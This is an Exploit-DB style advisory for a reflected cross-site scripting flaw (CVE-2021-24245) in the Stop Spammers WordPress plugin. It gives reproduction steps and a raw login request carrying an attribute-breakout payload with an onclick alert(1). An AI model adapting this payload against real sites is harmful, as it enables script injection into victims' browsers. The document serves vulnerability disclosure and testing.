# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) # Date: 04/08/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/ # Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip # Version: <= 2021.8 # Tested on: Windows-Ubuntu # CVE : CVE-2021-24245 Summary: Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript Proof of concepts: 1-Install "Stop Spammers <= 2021.8" in your wordpress website 2-For testing remove your IP address from the allowed list 3-Go to http://<YOUR-WEBSITE>/wp-admin 4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) " #Notice the `ad` keyword must be in your payload! 5-Press Alt + Shift + X to trigger Xss #Tested on Firefox Request POC: POST /wp-login.php HTTP/1.1 Host: localhost Connection: close Content-Length: 161 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_test_cookie=WP+Cookie+check; log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1